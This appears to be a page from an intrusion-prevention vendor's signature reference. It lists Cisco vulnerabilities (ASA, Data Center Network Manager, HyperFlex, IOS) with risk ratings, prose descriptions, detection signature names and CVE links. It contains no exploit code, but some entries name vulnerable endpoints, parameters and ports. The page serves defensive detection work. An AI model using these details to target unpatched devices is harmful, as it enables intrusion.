https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0101
Back to top

Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Cisco Systems AnyConnect
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cisco Systems AnyConnect
Type: Malfunction
Description: A remote code execution vulnerability exist in the ActiveX control which aids in downloading and executing the actual Cisco AnyConnect VPN Client. The vulnerability is due to the ActiveX control failing to properly validate the authenticity of the downloaded executable when the client is deployed from the VPN headend.
Situation: HTTP_SS-Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution
File-Text_Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution
References:
CVE-2011-2039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2039
OSVDB-72714
http://www.osvdb.org/72714
Back to top

Cisco-AnyConnect-VPN-Client-Software-Downgrade

About this vulnerability: A vulnerability in Cisco Systems AnyConnect Secure Mobility Client
Risk: Moderate
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems AnyConnect
Type: Buffer Overflow
Description: There is a software downgrade flaw in Cisco AnyConnect VPN client. The vulnerability is due to the WebLaunch component failing to properly validate the version of the vpndownloader.exe program when the client is deployed from the VPN headend. By enticing a user to open a specially crafted web page, a remote attacker can exploit this vulnerability to install an older version of vpndownloader.exe which is vulnerable to previously patch issues. Successful exploitation can result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Text_Cisco-AnyConnect-VPN-Client-Software-Downgrade
References:
CVE-2012-2494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2494
OSVDB-83159
http://www.osvdb.org/83159
Back to top

Cisco-ASA-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Adaptive Security Appliance
Risk: High
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Directory Traversal
Description: A vulnerability in Cisco Adaptive Security Appliance which allows remote attackers to gather contents of Cisco's VPN web service including directories and files through a directory traversal.
Situation: HTTP_CSU-Cisco-ASA-Directory-Traversal
References:
CVE-2018-0296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296
Back to top

Cisco-ASA-Line-Dancer-Malware-Implant-Interaction

About this vulnerability: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Risk: High
First detected in: sgpkg-ips-1722-5242
Last changed: sgpkg-ips-1722-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Input Validation
Description: Line Dancer is an in-memory implant targeting Cisco Adaptive Security Appliance (ASA) devices. It enabling threat actors to upload and execute arbitrary shellcode/commands received from the "host-scan-reply" field of the request. This fingerprint does not detect the installation of the implant but the implant's interaction only.
Situation: File-Text_Cisco-ASA-Line-Dancer-Malware-Implant-Interaction
File-TextId_Cisco-ASA-Line-Dancer-Malware-Implant-Interaction
Back to top

Cisco-ASA-Line-Runner-Malware-Shellcode-Interaction-CVE-2024-20359

About this vulnerability: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Risk: High
First detected in: sgpkg-ips-1722-5242
Last changed: sgpkg-ips-1722-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Backdoor
Description: Line Runner is a persistent Lua-based webshell targeting the Cisco Adaptive Security Appliance (ASA) WebVPN device customization functionality. It offers the ability to run arbitrary Lua code sent via HTTP GET requests to legitimate Cisco ASA WebVPN/AnyConnect URIs. This fingerprint does not detect the implantation of the webshell but its interaction only.
Situation: HTTP_CRL-Cisco-ASA-Line-Runner-Malware-Shellcode-Interaction-CVE-2024-20359
References:
CVE-2024-20359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20359
Back to top

Cisco-ASA-SSL-VPN-Code-Execution-CVE-2018-0101

About this vulnerability: A vulnerability in Cisco ASA SSL VPN
Risk: High
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Input Validation
Description: There is a vulnerability in Cisco Adaptive Security Appliance (ASA) Software. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: File-TextId_Cisco-ASA-SSL-VPN-Code-Execution-CVE-2018-0101
References:
CVE-2018-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0101
Back to top

Cisco-ASA-SSL-VPN-Privilege-Escalation

About this vulnerability: A Cisco ASA SSL VPN Privilege Escalation vulnerability.
Risk: High
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Configuration Error
Description: A vulnerability in Cisco Adaptive Security Appliance, versions 8.x before 8.2(5.48), which allows remote attackers to gain privileges by establishing a clientless SSL VPN session and entering crafted URLs.
Situation: HTTP_CSU-Cisco-ASA-SSL-VPN-Privilege-Escalation
References:
CVE-2014-2127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2127
Back to top

Cisco-ASA-X-With-FirePOWER-Services-Authenticated-Command-Injection

About this vulnerability: A vulnerability in Cisco ASA-X.
Risk: High
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1507-5242
Platform: Unix; Linux
Software: Cisco Adaptive Security Appliance
Type: Input Validation
Description: A vulnerability in Cisco ASA-X, versions 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*, which allows remote attackers to exexute arbitrary code through the ASA's ASDM web server.
Situation: HTTP_CSU-Cisco-ASA-X-With-FirePOWER-Services-Authenticated-Command-Injection
References:
CVE-2022-20828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20828
Back to top

Cisco-CNS-Network-Registrar-Denial-Of-Service

About this vulnerability: A vulnerability in Cisco Systems CNS Network Registrar
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cisco Network Registrar
Type: Input Validation
Description: There is a vulnerability in the way Cisco CNS Network Registrar handles network messages. The lock manager process, a component of the vulnerable product, will terminate upon receiving a specially crafted sequence of packets. This termination of this process will cause complete failure of the Central Configuration Management (CCM) server. An attacker can exploit this vulnerability to create a denial of service condition of the management services. CNS Network Registrar lock manager process (aiclockmgr.exe) will terminate upon receiving the specially crafted sequence of packets. This may also terminate the Central Configuration Management (CCM) server. The loss of the lock manager will prevent CCM from managing the various CNS components: DNS, DHCP , TFTP and configuration information such as address space, zones, user administration, and so on. An administrator must restart the server agent for normal operations to resume.
Situation: Generic_CS-Cisco-CNS-Network-Registrar-Denial-Of-Service
References:
CVE-2004-1164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1164
BID-11793
http://www.securityfocus.com/bid/11793
Back to top

Cisco-Collaboration-Server-Upload-Vulnerability

About this vulnerability: Cisco Collaboration Server Upload Vulnerability
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Cisco Collaboration Server
Type: Input Validation
Description: There exists a vulnerability in Cisco Collaboration Server that allows an unauthorized user to upload files and gain administrative privileges.
Situation: HTTP_CSU-Cisco-Collaboration-Server-Upload-Vulnerability
Back to top

Cisco-Common-Services-Devices-Center-Cross-Site-Scripting

About this vulnerability: A vulnerability in Cisco Systems Common Services Devices Center
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Cisco Systems Unified Operations Manager
Type: Input Validation
Description: A cross-site scripting vulnerability exists within Cisco's Common Services Device Center, a component of Cisco's Unified Operations Manager. The vulnerability is due to insufficient input validation on input to a web application. A remote unauthenticated attacker can exploit this vulnerability by executing arbitrary HTML and script code in a user's browser session, in the context of the affected site. This could potentially allow confidential user information such as authentication cookies to be disclosed.
Situation: HTTP_CSU-Cisco-Common-Services-Devices-Center-Cross-Site-Scripting
References:
CVE-2011-0962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0962
OSVDB-72421
http://www.osvdb.org/72421
Back to top

Cisco-Common-Services-Framework-Help-Servlet-Cross-Site-Scripting

About this vulnerability: An attempt to exploit a vulnerability in CiscoWorks Common Services Framework Help Servlet
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Cisco Systems CiscoWorks Common Services; Cisco Systems Unified Operations Manager
Type: Cross-site Scripting
Description: A cross-site scripting vulnerability exists within CiscoWorks Common Services Framework Help Servlet. The vulnerability is due to insufficient input validation while parsing input to a web application.
Situation: HTTP_CSU-Cisco-Common-Services-Framework-Help-Servlet-Cross-Site-Scripting
References:
CVE-2011-0961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0961
BID-47902
http://www.securityfocus.com/bid/47902
OSVDB-72413
http://www.osvdb.org/72413
Back to top

Cisco-Data-Center-Network-Manager-Createlanfabric-Command-Injection

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Malfunction
Description: Improper validation of inputs sent by the client causes a command injection vulnerability in Cisco Data Center Network Manager. A successful exploit may allow an attacker to execute arbitrary code on the target system with administrator privileges.
Situation: File-Text_Cisco-Data-Center-Network-Manager-Createlanfabric-Command-Injection
References:
CVE-2019-15978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15978
Back to top

Cisco-Data-Center-Network-Manager-Deletereporttemplate-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1228-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Directory Traversal
Description: There exists an arbitrary file deletion vulnerability in Cisco Data Center Network Manager. Successful exploitation could lead in arbitrary file deletion from the target system.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Deletereporttemplate-Arbitrary-File-Deletion
References:
CVE-2019-15981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15981
Back to top

Cisco-Data-Center-Network-Manager-Getconfigtemplatefilename-SQL-Injection

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Input Validation
Description: Insufficient validation of request data causes an SQL injection vulnerability in Cisco Data Center Network Manager. A successful exploit may allow an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Cisco-Data-Center-Network-Manager-Getconfigtemplatefilename-SQL-Injection
References:
CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984
Back to top

Cisco-Data-Center-Network-Manager-Getlicenses-SQL-Injection

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Input Validation
Description: There has been reported a pre-auth SQL injection in Cisco Data Center Network Manager. Successful exploitation could result in arbitrary code execution.
Situation: HTTP_CSU-Cisco-Data-Center-Network-Manager-Getlicenses-SQL-Injection
References:
CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984
Back to top

Cisco-Data-Center-Network-Manager-Getrestorelog-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Input Validation
Description: There has been reported an information disclosure vulnerability in Cisco Data Center Network Manager. This vulnerablity could be exploited by an authenticated attacker. Successful exploitation could lead in disclosure of the target system files.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Getrestorelog-Directory-Traversal
References:
CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980
Back to top

Cisco-Data-Center-Network-Manager-Getswitchsdatalength-SQL-Injection

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1266-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Input Validation
Description: Insufficient input validation causes an SQL injection vulnerability in Cisco Data Center Network Manager. A successful exploit allows an attacker to run arbitrarty SQL on the target database.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Getswitchsdatalength-SQL-Injection
References:
CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984
Back to top

Cisco-Data-Center-Network-Manager-Gettokeninfo-SQL-Injection

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1257-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Input Validation
Description: Insufficient input validation causes an SQL injection vulnerability in Cisco Data Center Network Manager. A successful exploit allows an attacker to execute arbitrary code with the privileges of the database.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Gettokeninfo-SQL-Injection
References:
CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984
Back to top

Cisco-Data-Center-Network-Manager-Importts-Command-Injection

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Input Validation
Description: Improper validation of the certFile parameter in requests to the importTS endpoint causes a command injection vulnerability in Cisco Data Center Network Manager. A successful exploit allows a remote attacker to execute arbitrary commands on the target system with administrative privileges.
Situation: File-TextId_Cisco-Data-Center-Network-Manager-Importts-Command-Injection
References:
CVE-2019-15979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15979
Back to top

Cisco-Data-Center-Network-Manager-Installswitchlicense-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: High
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Cisco Data Center Network Manager. The vulnerability is due to insufficient validation of HTTP parameters by the Java class DbAdminRest A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could result in arbitrary file write, which could be used to perform arbitrary code execution in the security context of SYSTEM.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Installswitchlicense-Directory-Traversal
References:
CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980
Back to top

Cisco-Data-Center-Network-Manager-Persistuserinfo-SQL-Injection

About this vulnerability: A vulnerability in Cisco Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Input Validation
Description: Insufficient validation of request data causes an SQL injection vulnerability in Cisco Data Center Network Manager. A successful attack may allow an attacker to execute arbitrary SQL on the target database.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Persistuserinfo-SQL-Injection
References:
CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984
Back to top

Cisco-Data-Center-Network-Manager-RCE

About this vulnerability: A vulnerability in Cisco Data Center Network Manager
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1645-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Insecure Configuration
Description: A vulnerability in Data Center Network Manager, versions 10.4, 11.0, and 11.1, which allows remote attackers to upload war files to the Apache Tomcat webapps directory and gain remote code execution through the /fm/fileUpload file upload servlet.
References:
CVE-2019-1620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1620
Back to top

Cisco-Data-Center-Network-Manager-Readconfigfileasxml-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Directory Traversal
Description: Improper validation of user-sent XML data causes a directory traversal vulnerability in Cisco Data Center Network Manager. A successful exploit may allow an attacker to gain access to arbitrary files on the target system.
Situation: File-TextId_Cisco-Data-Center-Network-Manager-Readconfigfileasxml-Directory-Traversal
References:
CVE-2019-15981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15981
Back to top

Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Directory Traversal
Description: Improper validation of the input data in the HTTP request by the Java class ReportWS causes a directory traversal vulnerability in Cisco Data Center Network Manager. A successful exploit may allow an attacker to write files which will be executed with system privileges.
Situation: File-Text_Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal
File-TextId_Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal
References:
CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980
Back to top

Cisco-Data-Center-Network-Manager-Savelicensefiletoserver-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Directory Traversal
Description: Insufficient validation of HTTP parameters by the Java class DbAdminRest causes a directory traversal vulnerability in Cisco Systems Data Center Network Manager. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Savelicensefiletoserver-Directory-Traversal
References:
CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980
Back to top

Cisco-Data-Center-Network-Manager-Savezoneinputfiletoserver-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: High
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Cisco Data Center Network Manager. The vulnerability is due to insufficient validation of HTTP parameter filename in the method saveZoneInputFileToServer. A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could result in arbitrary file write, which could be used to perform arbitrary code execution in the security context of SYSTEM.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Savezoneinputfiletoserver-Directory-Traversal
References:
CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980
Back to top

Cisco-Data-Center-Network-Manager-Securitymanager-Authentication-Bypass

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Malfunction
Description: There has been reported an authentication bypass vulnerability in the SecurityManager component of Cisco Data Center Network Manager. Successful exploitation could lead in authentication bypass.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Securitymanager-Authentication-Bypass
References:
CVE-2019-15976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15976
Back to top

Cisco-Data-Center-Network-Manager-Storefilecontentinfs-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Directory Traversal
Description: Improper validation of requests to the storeFileContentInFS() method causes a directory traversal vulnerability in Cisco Data Center Network Manager. A successful exploit allows an attacker to overwrite any file on the target system, allowing arbitrary code execution.
Situation: HTTP_CRL-Cisco-Data-Center-Network-Manager-Storefilecontentinfs-Directory-Traversal
References:
CVE-2019-15981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15981
Back to top

Cisco-Dcnm-TrustedClientTokenValidator-Authentication-Bypass

About this vulnerability: A vulnerability in Cisco Data Center Network Manager
Risk: High
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Data Center Network Manager
Type: Insecure Configuration
Description: There exists a vulnerability in Cisco Data Center Network Manager, versions prior to 11.3(1), which allows remote attackers to bypass authentication through the TrustedClientTokenValidator component by creating a valid session token from a hard coded cryptographic key which is shared across installations.
Situation: HTTP_CS-Cisco-Dcnm-TrustedClientTokenValidator-Authentication-Bypass
References:
CVE-2019-15975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15975
Back to top

Cisco-Dcnm-Unauthenticated-File-Download

About this vulnerability: A vulnerability in Cisco Data Center Network Manager
Risk: High
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Cisco Systems Prime Data Center Network Manager
Type: Malfunction
Description: A vulnerability in Cisco Data Center Network Manager, Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), which allows unathenticated remote attackers to download arbitrary files from the target filesystem.
Situation: HTTP_CSU-Cisco-Dcnm-Unauthenticated-File-Download
References:
CVE-2019-1621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1621
Back to top

Cisco-Elastic-Services-Controller-Rest-API-Authentication-Bypass

About this vulnerability: A vulnerability in Cisco Systems Elastic Services Controller
Risk: Moderate
First detected in: sgpkg-ips-1166-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Elastic Services Controller
Type: Malfunction
Description: There has been reported an authentication bypass vulnerability in Cisco Elastic Services Controller. This vulnerability could be exploited by sending a crafted HTTP request to the target server. Successful exploitation could lead in bypass of authentication.
Situation: HTTP_CRH-Cisco-Elastic-Services-Controller-Rest-API-Authentication-Bypass
References:
CVE-2019-1867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1867
Back to top

Cisco-Hyperflex-Hx-Auth-Handling-Remote-Command-Execution

About this vulnerability: A vulnerability in Cisco Systems HyperFlex Software
Risk: Moderate
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Platform: Generic
Software: Cisco HyperFlex
Type: Input Validation
Description: Improper sanitization of parameters sent by the user causes a remote command execution vulnerability in Cisco HyperFlex. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Cisco-Hyperflex-Hx-Auth-Handling-Remote-Command-Execution
References:
CVE-2021-1497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1497
Back to top

Cisco-Hyperflex-Hx-Data-Platform-File-Upload-To-RCE

About this vulnerability: A vulnerability in Cisco HyperFlex HX Data Platform.
Risk: High
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Linux; Unix
Software: Cisco HyperFlex
Type: Input Validation
Description: A vulnerability in Cisco HyperFlex HX Data Platform which allows remote unauthenticated attackers to upload and execute arbitrary code do the insufficient validation of the /upload endpoint.
Situation: HTTP_CS-Cisco-Hyperflex-Hx-Data-Platform-File-Upload-To-RCE
References:
CVE-2021-1499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1499
Back to top

Cisco-Hyperflex-Hx-Storfs-asup-Handling-Remote-Command-Execution

About this vulnerability: A vulnerability in Cisco Systems HyperFlex Software
Risk: High
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Generic
Software: Cisco HyperFlex
Type: Input Validation
Description: A remote command execution vulnerability has been reported in Cisco Hyperflex. The vulnerability is due to improper input sanitization. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the web-based management interface of the target server. Successful exploitation could lead to execution of arbitrary code in the context of the target process.
Situation: HTTP_CRL-Cisco-Hyperflex-Hx-Storfs-asup-Handling-Remote-Command-Execution
References:
CVE-2021-1498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1498
Back to top

Cisco-Identity-Services-Engine-Livelogsettingsservlet-Stored-XSS

About this vulnerability: A vulnerability in Cisco Systems Identity Services Engine
Risk: Moderate
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems ISE
Type: Input Validation
Description: There has been reported a stored cross site scripting vulnerability in Cisco Identity Services Engine. Successful exploitation can lead in execution of arbitrary script code in a web browser.
Situation: HTTP_CSU-Cisco-Identity-Services-Engine-Livelogsettingsservlet-Stored-XSS
References:
CVE-2018-15440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15440
Back to top

Cisco-IKE-Information-Disclosure

About this vulnerability: A vulnerability in Cisco Internet Key Exchange version 1.
Risk: High
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Platform: Generic
Software: Cisco IKE
Type: Malfunction
Description: A vulnerability in Cisco Internet Key Exchange version 1, which allows attackers to disclose information by sending a crafted IKEv1 packet to an affected device.
Situation: Generic_UDP-Cisco-IKE-Information-Disclosure
References:
CVE-2016-6415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6415
Back to top

Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6736

About this vulnerability: A vulnerability in Cisco IOS
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Cisco IOS
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the SNMP subsystem of Cisco IOS 12.0 through 12.4, 15.0 through 15.6, and IOS XE 2.2 through 3.17. A remote attacker could use this vulnerability to execute code via a crafted SNMP packet.
Situation: SNMP-UDP_Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6736
References:
CVE-2017-6736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6736
Back to top

Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6742

About this vulnerability: A vulnerability in Cisco IOS
Risk: High
First detected in: sgpkg-ips-1801-5242
Last changed: sgpkg-ips-1801-5242
Platform: Cisco IOS
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the SNMP subsystem of Cisco IOS 12.0 through 12.4, 15.0 through 15.6, and IOS XE 2.2 through 3.17. A remote attacker could use this vulnerability to execute code via a crafted SNMP packet.
Situation: SNMP-UDP_Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6742
References:
CVE-2017-6742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6742
Back to top

Cisco-IOS-And-IOS-XE-Software-Smart-Install-Remote-Code-Execution

About this vulnerability: A vulnerability in Cisco Smart Install (SMI)
Risk: High
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1296-5242
Platform: Cisco IOS
Software: Cisco SMI
Type: Buffer Overflow
Description: A vulnerability in the Smart Install (SMI) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, Causing an indefinite loop on the affected device that triggers a watchdog crash.
Situation: Generic_TCP-SIET-Get_Config-Command
Generic_TCP-SIET-Change_Config-Command
Generic_TCP-SIET-Update_ios-And-Execute-Command
Generic_TCP-Cisco-SMI-Exploit-CVE-2018-0171
Generic_TCP-Cisco-IOS-And-IOS-XE-Software-Smart-Install-Buffer-Overflow
References:
CVE-2018-0171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0171
Back to top

Cisco-IOS-HTTP-Authentication-Bypass

About this vulnerability: Cisco IOS HTTP authentication bypass vulnerability
Risk: High
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1296-5242
Platform: Cisco IOS
Software: <os>
Type: Input Validation
Description: There is an authentication bypass vulnerability in Cisco IOS version 11.3. An unauthenticated remote user can use this vulnerability to execute any command with privilege level 15, allowing unrestriced access to the vulnerable device.
Situation: HTTP_CSU-Cisco-IOS-HTTP-Authentication-Bypass
References:
CVE-2001-0537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0537
BID-2936
http://www.securityfocus.com/bid/2936
OSVDB-578
http://www.osvdb.org/578
Back to top

Cisco-IOS-Next-Hop-Resolution-Protocol-Vulnerability

About this vulnerability: A vulnerability in Cisco IOS
Risk: High
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1296-5242
Platform: Cisco IOS
Software: <os>
Type: Malfunction
Description: There exists a buffer overflow vulnerability in the Next Hop Resolution Protocol (NHRP) functionality in Cisco IOS. This vulnerability allows remote attackers to cause a denial of service (restart) and execute arbitrary code via a crafted NHRP packet.
Situation: IPv4_Cisco-IOS-Next-Hop-Resolution-Protocol-Vulnerability
References:
CVE-2007-4286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4286
Back to top

Cisco-IOS-Server-HTTP-Interface-Cross-Site-Scripting

About this vulnerability: Cross site scripting in the Cisco IOS HTTP Server detected
Risk: Low
